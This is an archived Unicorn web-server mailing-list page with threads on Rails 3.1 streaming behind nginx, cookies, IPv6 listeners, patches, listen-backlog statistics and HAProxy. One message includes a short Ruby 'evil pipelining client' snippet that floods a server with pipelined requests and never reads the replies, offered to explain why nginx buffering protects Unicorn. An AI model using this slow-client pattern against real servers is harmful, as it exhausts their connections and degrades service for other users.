and JavaScript assets while the application builds an hypothetically
costly dynamic response.

> nginx only sends HTTP/1.0 requests to unicorn, so Rack::Chunked won't
> actually send a chunked/streamed response.  Rails 3.1 /could/ enable
> streaming without chunking for HTTP/1.0, but only if the client
> didn't set a non-standard HTTP/1.0 header to enable keepalive.  This
> is because HTTP/1.0 (w/o keepalive) relies on the server to close
> the connection to signal the end of a response.

It's clear then. Also, Rails has code that prevents streaming from
being triggered if the request is HTTP/1.0:

https://github.com/rails/rails/blob/master/actionpack/lib/action_controller/metal/streaming.rb#L243-244

> You can use "X-Accel-Buffering: no" if you know your responses are small
> enough to fit into the kernel socket buffers.  There's two kernel
> buffers (Unicorn + nginx), you can get a little more space there.  nginx
> shouldn't make another request to Unicorn if it's blocked writing a
> response to the client already, so an evil pipelining client should not
> hurt unicorn in this case:

Excellent.

Thanks Eric!
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: Unicorn and streaming in Rails 3.1
  @ 2011-06-25 20:16  5% ` Eric Wong
  2011-06-25 22:23  0%   ` Xavier Noria
  2011-06-25 20:33  4% ` Eric Wong
  1 sibling, 1 reply; 200+ results
From: Eric Wong @ 2011-06-25 20:16 UTC (permalink / raw)
  To: unicorn list

Xavier Noria <fxn@hashref.com> wrote:
> Streaming works with Unicorn + Apache. Both with and without deflating.
> 
> My understanding is that Unicorn + Apache is not a good combination
> though because Apache does not buffer, and thus Unicorn has no fast
> client in front. (I don't know which is the ultimate technical reason
> Unicorn puts such an emphasis on fast clients, but will do some
> research about it.)

Basically the per-connection overhead of Unicorn is huge, an entire Ruby
process (tens to several hundreds of megabytes).  The per-connection
overhead of nginx is tiny: maybe a few KB in userspace (including
buffers), and a few KB in in the kernel.  You don't want to maintain
connections to Unicorn for a long time because of that cost.

OK, if you have any specific questions that aren't answered in the
website, please ask.

> I have seen in
> 
>     http://unicorn.bogomips.org/examples/nginx.conf
> 
> the comment
> 
>     "You normally want nginx to buffer responses to slow
>     clients, even with Rails 3.1 streaming because otherwise a slow
>     client can become a bottleneck of Unicorn."
> 
> If I understand how this works correctly, nginx buffers the entire
> response from Unicorn. First filling what's configured in
> proxy_buffer_size and proxy_buffers, and then going to disk if needed
> as a last resort. Thus, even if the application streams, I believe the
> client will receive the chunked response, but only after it has been
> generated by the application and fully buffered by nginx. Which
> defeats the purpose of streaming

Yes.

> in the use case we have in mind in
> Rails 3.1, which is to serve HEAD as soon as possible.

Small nit: s/HEAD/the response header/   "HEAD" is a /request/ that only
expects to receive the response header.

nginx only sends HTTP/1.0 requests to unicorn, so Rack::Chunked won't
actually send a chunked/streamed response.  Rails 3.1 /could/ enable
streaming without chunking for HTTP/1.0, but only if the client
didn't set a non-standard HTTP/1.0 header to enable keepalive.  This
is because HTTP/1.0 (w/o keepalive) relies on the server to close
the connection to signal the end of a response.

> Is that comment in the example configuration file actually saying that
> Unicorn with nginx buffering is not broken? I mean, that if your
> application has some actions with stream enabled and you put it behind
> this setup, the content will be delivered albeit not streamed?

Correct.

> If that is correct. Is it reasonable to send to nginx the header
> X-Accel-Buffering to disable buffering only for streamed responses? Or
> is it a very bad idea? If it is a real bad idea, is the recommendation
> to Unicorn users that they should just ignore this new feature?

You can use "X-Accel-Buffering: no" if you know your responses are small
enough to fit into the kernel socket buffers.  There's two kernel
buffers (Unicorn + nginx), you can get a little more space there.  nginx
shouldn't make another request to Unicorn if it's blocked writing a
response to the client already, so an evil pipelining client should not
hurt unicorn in this case:

   require "socket"
   host = "example.com"
   s = TCPSocket.new(host, 80)
   req = "GET /something/big HTTP/1.1\r\nHost: #{host}\r\n\r\n"

   # pipeline a large number of requests, nginx won't send another
   # request to an upstream if it's still writing one
   30.times { s.write(req) }

   # don't read the response, or read it slowly, just keep the socket
   # open here...
   sleep

-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 5%]

* Re: Unicorn and streaming in Rails 3.1
    2011-06-25 20:16  5% ` Eric Wong
@ 2011-06-25 20:33  4% ` Eric Wong
  1 sibling, 0 replies; 200+ results
From: Eric Wong @ 2011-06-25 20:33 UTC (permalink / raw)
  To: unicorn list

Xavier Noria <fxn@hashref.com> wrote:
> If it is a real bad idea, is the recommendation
> to Unicorn users that they should just ignore this new feature?

Another thing, Rainbows! + ThreadSpawn/ThreadPool concurrency may do the
trick (without needing nginx at all).  The per-client overhead of
Rainbows! + threads (several hundred KB) is higher than nginx, but still
much lower than Unicorn.

All your Rails code must be thread-safe, though.

If you use Linux, XEpollThreadPool/XEpollThreadSpawn can be worth a
try, too.  The cost of completely idle keepalive clients should be
roughly inline with nginx.

If you want to forgo thread-safety, Rainbows! + StreamResponseEpoll[1]
+ ForceStreaming middleware[2] may also be an option, too (needs nginx).


Keep in mind that I don't know of anybody using Rainbows! for any
serious sites, so there could still be major bugs :)

Rainbows! http://rainbows.rubyforge.org/


[1] currently in rainbows.git, will probably be released this weekend...

[2] I'll probably move this to Rainbows! instead of a Unicorn branch:
    http://bogomips.org/unicorn.git/tree/lib/unicorn/force_streaming.rb?h=force_streaming
    This is 100% untested, I've never run it.

-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 4%]

* Re: problem setting multiple cookies
  @ 2011-06-22  1:59  4%                   ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2011-06-22  1:59 UTC (permalink / raw)
  To: unicorn list

Jason Su <jason@lookbook.nu> wrote:
> That's strange, doesn't really explain why cookies work fine on a
> fresh Rails 2.3.8 app, nor why cookies stopped working for me after I
> switched to Unicorn.

Actually, another option you could try is to use OldRails (designed for
Rails <= 2.2) and try to get that working with Rails 2.3.  This should
cause Rails 2.3 to use the cgi_wrapper.rb and not the native Rack
interface:

--------------- config.ru ------------------
require "unicorn/app/old_rails"
use Unicorn::App::OldRails::Static
run Unicorn::App::OldRails.new
--------------------------------------------

-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 4%]

* Re: [PATCH] examples/nginx.conf: add ipv6only comment
  2011-06-07  2:28  9% [PATCH] examples/nginx.conf: add ipv6only comment Eric Wong
@ 2011-06-07 17:04 10% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2011-06-07 17:04 UTC (permalink / raw)
  To: mongrel-unicorn

My wording sucked for the original comment, just pushed this out to
unicorn.git (6eefc641c84eaa86cb2be4a2b1983b15efcbfae1)

diff --git a/examples/nginx.conf b/examples/nginx.conf
index 368e19e..cc1038a 100644
--- a/examples/nginx.conf
+++ b/examples/nginx.conf
@@ -90,7 +90,7 @@ http {
     # If you have IPv6, you'll likely want to have two separate listeners.
     # One on IPv4 only (the default), and another on IPv6 only instead
     # of a single dual-stack listener.  A dual-stack listener will make
-    # $remote_addr will make IPv4 addresses ugly (e.g ":ffff:10.0.0.1"
+    # for ugly IPv4 addresses in $remote_addr (e.g ":ffff:10.0.0.1"
     # instead of just "10.0.0.1") and potentially trigger bugs in
     # some software.
     # listen [::]:80 ipv6only=on; # deferred or accept_filter recommended
-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply related	[relevance 10%]

* [PATCH] examples/nginx.conf: add ipv6only comment
@ 2011-06-07  2:28  9% Eric Wong
  2011-06-07 17:04 10% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2011-06-07  2:28 UTC (permalink / raw)
  To: mongrel-unicorn

IPv4 addresses started looking very ugly the first time I got
IPv6 working on bogomips.org.  In case somebody else can't stand
how IPv4-mapped-IPv6 addresses look, the workaround is to use
two listeners and ensure the IPv6 one is ipv6only.

Unicorn itself supports IPv6, too, but nobody uses/needs it.
I'll add :ipv6only support shortly (probably tomorrow).

>From 32b340b88915ec945ebdbfa11b7da242860a6f44 Mon Sep 17 00:00:00 2001
From: Eric Wong <normalperson@yhbt.net>
Date: Mon, 6 Jun 2011 19:15:36 -0700
Subject: [PATCH] examples/nginx.conf: add ipv6only comment

IPv4-mapped-IPv6 addresses are fugly.
---
 examples/nginx.conf |    8 ++++++++
 1 files changed, 8 insertions(+), 0 deletions(-)

diff --git a/examples/nginx.conf b/examples/nginx.conf
index 9f245c8..368e19e 100644
--- a/examples/nginx.conf
+++ b/examples/nginx.conf
@@ -87,6 +87,14 @@ http {
     # listen 80 default deferred; # for Linux
     # listen 80 default accept_filter=httpready; # for FreeBSD
 
+    # If you have IPv6, you'll likely want to have two separate listeners.
+    # One on IPv4 only (the default), and another on IPv6 only instead
+    # of a single dual-stack listener.  A dual-stack listener will make
+    # $remote_addr will make IPv4 addresses ugly (e.g ":ffff:10.0.0.1"
+    # instead of just "10.0.0.1") and potentially trigger bugs in
+    # some software.
+    # listen [::]:80 ipv6only=on; # deferred or accept_filter recommended
+
     client_max_body_size 4G;
     server_name _;
 
-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply related	[relevance 9%]

* Re: unicorn stuck in sched_yield after ERESTARTNOHAND
  2011-06-01  0:31  4%       ` Bharanee Rathna
@ 2011-06-01  0:44  0%         ` Bharanee Rathna
  0 siblings, 0 replies; 200+ results
From: Bharanee Rathna @ 2011-06-01  0:44 UTC (permalink / raw)
  To: unicorn list

>> 1) recvfrom() isn't using the MSG_DONTWAIT flag.  I know you're using
>>   Linux, so kgio should be using MSG_DONTWAIT to do non-blocking
>>   recv...  Which versions of unicorn/kgio are you using?
>
> using kgio 2.3.2, i'll upgrade it and give it another try

repeatable with kgio 2.4.1
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 0%]

* Re: unicorn stuck in sched_yield after ERESTARTNOHAND
  @ 2011-06-01  0:31  4%       ` Bharanee Rathna
  2011-06-01  0:44  0%         ` Bharanee Rathna
  0 siblings, 1 reply; 200+ results
From: Bharanee Rathna @ 2011-06-01  0:31 UTC (permalink / raw)
  To: unicorn list

thanks for the quick response eric,

On Wed, Jun 1, 2011 at 9:48 AM, Eric Wong <normalperson@yhbt.net> wrote:
> Bharanee Rathna <deepfryed@gmail.com> wrote:
>> I'm encountering a weird error where the unicorn workers are stuck in
>> a loop after hitting a 500 on the backend sinatra app.
>
> Also, what extensions are you using in your app?

heaps of em. yajl, swift, rmagick, fastcaptcha, flock, nokogiri &
curb.  except swift and curb none of the others would be touching the
network.

>> strace at the point where it starts to go into a loop of death
>
>> select(7, [4 5], NULL, [3 6], {30, 0})  = 1 (in [5], left {27, 274382})
>> fchmod(8, 01)                           = 0
>> fcntl(5, F_GETFL)                       = 0x802 (flags O_RDWR|O_NONBLOCK)
>> accept4(5, {sa_family=AF_INET, sin_port=htons(56728),
>> sin_addr=inet_addr("10.1.1.4")}, [16], SOCK_CLOEXEC) = 12
>> recvfrom(12, 0x1c99fb0, 16384, 64, 0, 0) = -1 EAGAIN (Resource
>> temporarily unavailable)
>
> (I'm somewhat more awake, now, haven't been sleeping much)
>
> Two things look off in the line above:
>
> 1) recvfrom() isn't using the MSG_DONTWAIT flag.  I know you're using
>   Linux, so kgio should be using MSG_DONTWAIT to do non-blocking
>   recv...  Which versions of unicorn/kgio are you using?

using kgio 2.3.2, i'll upgrade it and give it another try

>
> 2) TCP_DEFER_ACCEPT should prevent recvfrom() from hitting EAGAIN
>   in the common case under Linux.
>
>> select(13, [12], NULL, NULL, NULL)      = ? ERESTARTNOHAND (To be restarted)
>> --- SIGINT (Interrupt) @ 0 (0) ---
>> rt_sigreturn(0x2)                       = -1 EINTR (Interrupted system call)
>
> What triggered SIGINT?

not sure

>
> Actually, after many lines of sched_yield() in your gist, I can see it
> does actually exit the process.  Did you kill it with SIGINT?  If so, I
> see nothing wrong...

yes i killed it after the worker looked stuck and wasn't responding for 30s
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 4%]

* Re: unicorn 1.1.x never-ending listen loop IOError exceptions
  @ 2011-03-23  1:09  4%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2011-03-23  1:09 UTC (permalink / raw)
  To: unicorn list

David Nghiem <david@zendesk.com> wrote:
> On Tue, Mar 22, 2011 at 2:39 PM, Eric Wong <normalperson@yhbt.net> wrote:
> > No Errno::EBADF errors at all?
> 
> I didn't check before or after the block of Errno::IOError errors,
> there were enough IOError logs to fill up 40gb of disk.  I'll capture
> the entire deleted log next time.

Yikes.  The first few lines of error messages should be enough.

> >> ruby    15209 zendesk    1w   REG              252,0           0
> >> 3015360 /data/zendesk/log/unicorn.stdout.log
> >> ruby    15209 zendesk    2w   REG              252,0       24585
> >> 3015203 /data/zendesk/log/unicorn.stderr.log-20110110 (deleted)
> >> ruby    15209 zendesk    3w   REG              252,0 61617590073
> >> 3015097 /data/zendesk/log/unicorn.log-20110110 (deleted)
> >
> > Permissions issue during log rotation?  Are you doing "killall -USR1
> > unicorn" by any chance or sending a bunch of USR1 signals faster than
> > unicorn can process them?
> >
> > Try just sending one USR1 to the master process and letting the master
> > signal the workers.
> 
> Are the IOError exceptions and failure to rotate logs related?  My
> wild guess was this specific worker's unix socket got corrupted
> somehow.

There's a good possibility.  The USR1 signal closes a pipe we normally
select() on.  The closed pipe triggers a wakeup from select(), which
triggers the log reopening (and reopening of the pipe).

Do you see:  "worker=$NUM done reopening logs" messages in your
logs?

Another explanation is somehow you have a library that does something
along the lines of:

 ObjectSpace.each_object(IO) { |io| io.close unless io.closed? }

-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* [ANN] unicorn 3.3.1 and 1.1.6 - one minor, esoteric bugfix
  2011-01-06  7:20  3% [PATCH] close client socket after closing response body Eric Wong
@ 2011-01-07  0:16  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2011-01-07  0:16 UTC (permalink / raw)
  To: mongrel-unicorn

Eric Wong <normalperson@yhbt.net> wrote:
> I am wondering if there are any apps affected by this bug (and
> perhaps keeping people from switching Unicorn).
> 
> It's a fairly esoteric case, so I probably won't make another release
> until tomorrow (sleepy now, will probably screw something else up
> or realize something else is broken :)
> 
> Anyways it's pushed out to master and 1.1.x-stable in case people
> want^Wneed it *right* *now*:

I've just released v1.1.6 and v3.3.1 with the fix from last night,
maybe somebody in a dark corner of the web can finally migrate
to Unicorn because of this bugfix :)

-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 0%]

* [PATCH] close client socket after closing response body
@ 2011-01-06  7:20  3% Eric Wong
  2011-01-07  0:16  0% ` [ANN] unicorn 3.3.1 and 1.1.6 - one minor, esoteric bugfix Eric Wong
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2011-01-06  7:20 UTC (permalink / raw)
  To: mongrel-unicorn

I am wondering if there are any apps affected by this bug (and
perhaps keeping people from switching Unicorn).

It's a fairly esoteric case, so I probably won't make another release
until tomorrow (sleepy now, will probably screw something else up
or realize something else is broken :)

Anyways it's pushed out to master and 1.1.x-stable in case people
want^Wneed it *right* *now*:

>From b72a86f66c722d56a6d77ed1d2779ace6ad103ed Mon Sep 17 00:00:00 2001
From: Eric Wong <normalperson@yhbt.net>
Date: Wed, 5 Jan 2011 22:39:03 -0800
Subject: [PATCH] close client socket after closing response body

Response bodies may capture the block passed to each
and save it for body.close, so don't close the socket
before we have a chance to call body.close
---
 lib/unicorn/http_response.rb |    1 -
 lib/unicorn/http_server.rb   |    1 +
 t/t0018-write-on-close.sh    |   23 +++++++++++++++++++++++
 t/write-on-close.ru          |   11 +++++++++++

 (Unnecessary unit test case omitted for email)
 test/unit/test_response.rb   |   18 +++++++++---------

 5 files changed, 44 insertions(+), 10 deletions(-)
 create mode 100755 t/t0018-write-on-close.sh
 create mode 100644 t/write-on-close.ru

diff --git a/lib/unicorn/http_response.rb b/lib/unicorn/http_response.rb
index 3a03cd6..62b3ee9 100644
--- a/lib/unicorn/http_response.rb
+++ b/lib/unicorn/http_response.rb
@@ -38,7 +38,6 @@ module Unicorn::HttpResponse
     end
 
     body.each { |chunk| socket.write(chunk) }
-    socket.close # flushes and uncorks the socket immediately
     ensure
       body.respond_to?(:close) and body.close
   end
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index e2a4db7..3a6e51e 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -538,6 +538,7 @@ class Unicorn::HttpServer
     end
     @request.headers? or headers = nil
     http_response_write(client, status, headers, body)
+    client.close # flush and uncork socket immediately, no keepalive
   rescue => e
     handle_error(client, e)
   end
diff --git a/t/t0018-write-on-close.sh b/t/t0018-write-on-close.sh
new file mode 100755
index 0000000..3afefea
--- /dev/null
+++ b/t/t0018-write-on-close.sh
@@ -0,0 +1,23 @@
+#!/bin/sh
+. ./test-lib.sh
+t_plan 4 "write-on-close tests for funky response-bodies"
+
+t_begin "setup and start" && {
+	unicorn_setup
+	unicorn -D -c $unicorn_config write-on-close.ru
+	unicorn_wait_start
+}
+
+t_begin "write-on-close response body succeeds" && {
+	test xGoodbye = x"$(curl -sSf http://$listen/)"
+}
+
+t_begin "killing succeeds" && {
+	kill $unicorn_pid
+}
+
+t_begin "check stderr" && {
+	check_stderr
+}
+
+t_done
diff --git a/t/write-on-close.ru b/t/write-on-close.ru
new file mode 100644
index 0000000..54a2f2e
--- /dev/null
+++ b/t/write-on-close.ru
@@ -0,0 +1,11 @@
+class WriteOnClose
+  def each(&block)
+    @callback = block
+  end
+
+  def close
+    @callback.call "7\r\nGoodbye\r\n0\r\n\r\n"
+  end
+end
+use Rack::ContentType, "text/plain"
+run(lambda { |_| [ 200, [%w(Transfer-Encoding chunked)], WriteOnClose.new ] })
-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply related	[relevance 3%]

* Re: listen backlog
  2010-12-04 23:48  0%             ` Eric Wong
@ 2010-12-05  0:02  0%               ` ghazel
  0 siblings, 0 replies; 200+ results
From: ghazel @ 2010-12-05  0:02 UTC (permalink / raw)
  To: unicorn list

On Sat, Dec 4, 2010 at 3:48 PM, Eric Wong <normalperson@yhbt.net> wrote:
> ghazel@gmail.com wrote:
>> On Fri, Dec 3, 2010 at 1:49 PM, Eric Wong <normalperson@yhbt.net> wrote:
>> > ghazel@gmail.com wrote:
>> >> Using "modprobe inet_diag" made the script spit out a new error:
>> >>
>> >>             address     active     queued
>> >> linux-tcp-listener-stats.rb:42:in `tcp_listener_stats': NLMSG_ERROR
>> >> (RuntimeError)
>> >>         from linux-tcp-listener-stats.rb:42
>> >
>> > I don't think I've ever seen NLMSG_ERROR before.  Are you running
>> > this as the same user that originally bound the listener (the user
>> > of the Unicorn master process)?
>>
>> Yes. I also tried as root, same error.
>>
>> >> $ sudo modprobe -l inet_diag
>> >> /lib/modules/2.6.21.7-2.fc8xen/kernel/net/ipv4/inet_diag.ko
>> >>
>> >> I dug in to raindrops a little bit, and it seems the error associated
>> >> with the NLMSG_ERROR is -2,
>> >> "No such file or directory".
>> >
>> > Are you bound to 0.0.0.0:9000 and not 127.0.0.1:9000?  Use
>> > 0.0.0.0:9000 if you're bound to that (I had another user on the
>> > raindrops mailing list with that problem).
>>
>> My unicorn.rb says 127.0.0.1. But just to test I tried fetching stats
>> for 0.0.0.0:9000 but got the same error.
>
> Ah, can you try "modprobe tcp_diag", too?  I can't remember what other
> quirks there were for ancient kernels.  Hopefully that works, because
> I'd be at a loss otherwise :x

Ah! That worked. Thanks!

-Greg
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: listen backlog
  2010-12-03 22:49  0%           ` ghazel
@ 2010-12-04 23:48  0%             ` Eric Wong
  2010-12-05  0:02  0%               ` ghazel
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2010-12-04 23:48 UTC (permalink / raw)
  To: unicorn list

ghazel@gmail.com wrote:
> On Fri, Dec 3, 2010 at 1:49 PM, Eric Wong <normalperson@yhbt.net> wrote:
> > ghazel@gmail.com wrote:
> >> Using "modprobe inet_diag" made the script spit out a new error:
> >>
> >>             address     active     queued
> >> linux-tcp-listener-stats.rb:42:in `tcp_listener_stats': NLMSG_ERROR
> >> (RuntimeError)
> >>         from linux-tcp-listener-stats.rb:42
> >
> > I don't think I've ever seen NLMSG_ERROR before.  Are you running
> > this as the same user that originally bound the listener (the user
> > of the Unicorn master process)?
> 
> Yes. I also tried as root, same error.
> 
> >> $ sudo modprobe -l inet_diag
> >> /lib/modules/2.6.21.7-2.fc8xen/kernel/net/ipv4/inet_diag.ko
> >>
> >> I dug in to raindrops a little bit, and it seems the error associated
> >> with the NLMSG_ERROR is -2,
> >> "No such file or directory".
> >
> > Are you bound to 0.0.0.0:9000 and not 127.0.0.1:9000?  Use
> > 0.0.0.0:9000 if you're bound to that (I had another user on the
> > raindrops mailing list with that problem).
> 
> My unicorn.rb says 127.0.0.1. But just to test I tried fetching stats
> for 0.0.0.0:9000 but got the same error.

Ah, can you try "modprobe tcp_diag", too?  I can't remember what other
quirks there were for ancient kernels.  Hopefully that works, because
I'd be at a loss otherwise :x

-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 0%]

* Re: listen backlog
  2010-12-03 21:49  4%         ` Eric Wong
@ 2010-12-03 22:49  0%           ` ghazel
  2010-12-04 23:48  0%             ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: ghazel @ 2010-12-03 22:49 UTC (permalink / raw)
  To: unicorn list

On Fri, Dec 3, 2010 at 1:49 PM, Eric Wong <normalperson@yhbt.net> wrote:
> ghazel@gmail.com wrote:
>> Using "modprobe inet_diag" made the script spit out a new error:
>>
>>             address     active     queued
>> linux-tcp-listener-stats.rb:42:in `tcp_listener_stats': NLMSG_ERROR
>> (RuntimeError)
>>         from linux-tcp-listener-stats.rb:42
>
> I don't think I've ever seen NLMSG_ERROR before.  Are you running
> this as the same user that originally bound the listener (the user
> of the Unicorn master process)?

Yes. I also tried as root, same error.

>> $ sudo modprobe -l inet_diag
>> /lib/modules/2.6.21.7-2.fc8xen/kernel/net/ipv4/inet_diag.ko
>>
>> I dug in to raindrops a little bit, and it seems the error associated
>> with the NLMSG_ERROR is -2,
>> "No such file or directory".
>
> Are you bound to 0.0.0.0:9000 and not 127.0.0.1:9000?  Use
> 0.0.0.0:9000 if you're bound to that (I had another user on the
> raindrops mailing list with that problem).

My unicorn.rb says 127.0.0.1. But just to test I tried fetching stats
for 0.0.0.0:9000 but got the same error.

-Greg
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: listen backlog
  @ 2010-12-03 21:49  4%         ` Eric Wong
  2010-12-03 22:49  0%           ` ghazel
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2010-12-03 21:49 UTC (permalink / raw)
  To: unicorn list

ghazel@gmail.com wrote:
> On Thu, Dec 2, 2010 at 11:35 PM, Eric Wong <normalperson@yhbt.net> wrote:
> > UNIX sockets are faster for nginx <-> Unicorn, but Raindrops is slower
> > dealing with them since Linux doesn't export UNIX sockets stats to
> > netlink the same way it does for TCP sockets.  So there's always a
> > tradeoff :x
> 
> When does that netlink speed difference matter - only when collecting stats?

Yes, the performance difference is only when collecting stats.

> Using "modprobe inet_diag" made the script spit out a new error:
> 
>             address     active     queued
> linux-tcp-listener-stats.rb:42:in `tcp_listener_stats': NLMSG_ERROR
> (RuntimeError)
>         from linux-tcp-listener-stats.rb:42

I don't think I've ever seen NLMSG_ERROR before.  Are you running
this as the same user that originally bound the listener (the user
of the Unicorn master process)?

> $ sudo modprobe -l inet_diag
> /lib/modules/2.6.21.7-2.fc8xen/kernel/net/ipv4/inet_diag.ko
> 
> I dug in to raindrops a little bit, and it seems the error associated
> with the NLMSG_ERROR is -2,
> "No such file or directory".

Are you bound to 0.0.0.0:9000 and not 127.0.0.1:9000?  Use
0.0.0.0:9000 if you're bound to that (I had another user on the
raindrops mailing list with that problem).

-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 4%]

* Re: Unicorn and HAProxy, 500 Internal errors after checks
  @ 2010-12-01 19:58  4%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2010-12-01 19:58 UTC (permalink / raw)
  To: unicorn list

Pierre <oct@fotopedia.com> wrote:
> On Wed, Dec 1, 2010 at 5:52 PM, Eric Wong <normalperson@yhbt.net> wrote:
> > Hi Pierre, HAProxy should be configured to send proper HTTP checks and
> > not just TCP connection checks, the problem will go away then.
> 
> I understood this could be fixed this way and we will probably do that
> soon. However, I think this is also the responsibility of Unicorn not
> to reply anything when there's no request or at least log the error
> somewhere :)

I'm not sure how Unicorn is actually replying to anything, does HAProxy
write *anything* to the socket?

Logging those bad connections is another DoS vector I'd rather avoid,
and for connections where nothing is written, not even possible...

If you have the TCP_DEFER_ACCEPT (Linux) or accept filters (FreeBSD),
it's highly likely the Unicorn would never see the connection if the
client never wrote to it.

> > Also, I
> > can not recommend HAProxy unless you're certain all your clients are on
> > a LAN and can be trusted to never trickle uploads nor reading large
> > responses.
> 
> While I understand that uploads are very complicated to handle on the
> stack (even nginx can be confused at upload sometimes), HAProxy proved
> it was very good at managing tons of connections and high volume
> traffic from the Internet. All the more so as it allows a very high
> level of redundancy at a very small cost that cannot be achieved
> simply otherwise. Do you have any pointers about your worrying
> non-recommendation of HAProxy ?

HAProxy starts writing request bodies to Unicorn as soon as the upload
starts, which means the Unicorn process will be bounded by the speed of
the original client connection.  If multiple clients upload slowly,
then you'll end up hogging many Unicorn workers.

nginx can also limit the size of client uploads (default 1M) to prevent
unnecessary I/O.

If you serve large responses that can't fit in kernel socket buffers,
then Unicorn will get stuck writing out to a client that isn't reading
fast enough.

AFAIK, HAProxy also does not yet maintain keep-alive connections to
clients, whereas nginx does. Keep-alive is important to client browsers,
they can halve their active connections to a site if keep-alive is
supported.

-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 4%]

* Re: 502 bad gateway on nginx with recv() failed
  @ 2010-10-24  6:00  5%       ` Naresh V
  0 siblings, 0 replies; 200+ results
From: Naresh V @ 2010-10-24  6:00 UTC (permalink / raw)
  To: unicorn list

On 24 October 2010 04:52, Eric Wong <normalperson@yhbt.net> wrote:
> Naresh V <nareshov@gmail.com> wrote:
>> On 23 October 2010 02:44, Eric Wong <normalperson@yhbt.net> wrote:
>> > Naresh V <nareshov@gmail.com> wrote:
>> >> I'm serving the puppetmaster application with its config.ru through
>> >> unicorn - proxied by nginx.
>> >> I'm using unix sockets, 4 workers, and 2048 backlog.
>> >>
>> >> The clients - after their typical "puppet run" - send back a report to
>> >> the master in YAML.
>> >> Some clients whose reports tend to be large (close to 2mb) get a 502
>> >> bad gateway error and error out.
>> >>
>> >> nginx log:
>> >>
>> >> 2010/10/22 14:20:27 [error] 19461#0: *17115 recv() failed (104:
>> >> Connection reset by peer) while reading response header from upstream,
>> >> client: 1x.yy.zz.x4, server: , request: "PUT /production/report/nagios
>> >> HTTP/1.1", upstream:
>> >> "http://unix:/tmp/.sock:/production/report/nagios", host:
>> >> "puppet:8140"
>> >
>> > Hi Naresh, do you see anything in the Unicorn stderr log file?
>>
>> Hi Eric, I think I caught it:
>>
>> E, [2010-10-22T23:03:30.207455 #10184] ERROR -- : worker=2 PID:10206
>> timeout (60.207392s > 60s), killing
>> I, [2010-10-22T23:03:31.212533 #10184]  INFO -- : reaped
>> #<Process::Status: pid=10206,signaled(SIGKILL=9)> worker=2
>> I, [2010-10-22T23:03:31.214768 #10490]  INFO -- : worker=2 spawned pid=10490
>> I, [2010-10-22T23:03:31.221748 #10490]  INFO -- : worker=2 ready
>>
>> > Is the 2mb report part of the response or request?  Unicorn should
